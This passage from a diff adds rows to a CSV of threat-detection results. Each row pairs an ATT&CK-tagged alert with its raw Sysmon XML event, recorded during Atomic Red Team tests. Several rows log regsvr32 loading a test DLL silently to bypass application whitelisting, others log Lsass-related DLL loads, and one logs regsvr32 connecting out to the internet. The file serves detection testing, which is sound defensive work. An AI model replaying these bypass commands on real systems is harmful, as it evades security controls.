+    <Data Name=""FileVersion"">10.0.18362.1049 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">SAM Library DLL</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">SAMLib.DLL</Data>
+    <Data Name=""Hashes"">SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-20T11:51:09.842559Z"">
+    </TimeCreated>
+    <EventRecordID>1103</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""7212"" ThreadID=""5064"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>DESKTOP-NTSSLJD</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">-</Data>
+    <Data Name=""UtcTime"">2020-10-20 11:51:09.588</Data>
+    <Data Name=""ProcessGuid"">23F38D93-CEB4-5F8E-9F08-000000000C00</Data>
+    <Data Name=""ProcessId"">9392</Data>
+    <Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
+    <Data Name=""FileVersion"">10.0.18362.1049 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">SAM Library DLL</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">SAMLib.DLL</Data>
+    <Data Name=""Hashes"">SHA1=508CE06737747BC14DF3A4337F8A63B76472C629,MD5=0B4202913B86A44A0FAE7B80D425CDF8,SHA256=3501320367877A6EC814CAB179D329D41E32748F01973F5A053D5801DFC9594B,IMPHASH=3B8923EB77916A851639B50DFA19881B</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548027.083068,2019-07-19T18:53:47.083068+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c  IF %%PROCESSOR_ARCHITECTURE%% ==AMD64  ELSE ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.975169Z"">
+    </TimeCreated>
+    <EventRecordID>4046</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.938</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00102BE33800</Data>
+    <Data Name=""ProcessId"">4628</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c  IF %%PROCESSOR_ARCHITECTURE%% ==AMD64  ELSE  </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
+    </TimeCreated>
+    <EventRecordID>4045</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
+    <Data Name=""ProcessId"">5828</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
+    </TimeCreated>
+    <EventRecordID>4045</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
+    <Data Name=""ProcessId"">5828</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.975169,2019-07-19T18:53:46.975169+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( &quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.893188Z"">
+    </TimeCreated>
+    <EventRecordID>4045</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.867</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
+    <Data Name=""ProcessId"">5828</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
+    </TimeCreated>
+    <EventRecordID>4044</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
+    <Data Name=""ProcessId"">3564</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
+    </TimeCreated>
+    <EventRecordID>4044</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
+    <Data Name=""ProcessId"">3564</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( &quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.848703Z"">
+    </TimeCreated>
+    <EventRecordID>4044</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.831</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-00109DDC3800</Data>
+    <Data Name=""ProcessId"">3564</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\syswow64\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.589404Z"">
+    </TimeCreated>
+    <EventRecordID>4043</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3400"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:40.896</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
+    <Data Name=""ProcessId"">2076</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49728</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.0.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:46.565529Z"">
+    </TimeCreated>
+    <EventRecordID>4042</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:46.405</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D97A-5D31-0000-001089BD3800</Data>
+    <Data Name=""ProcessId"">7148</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
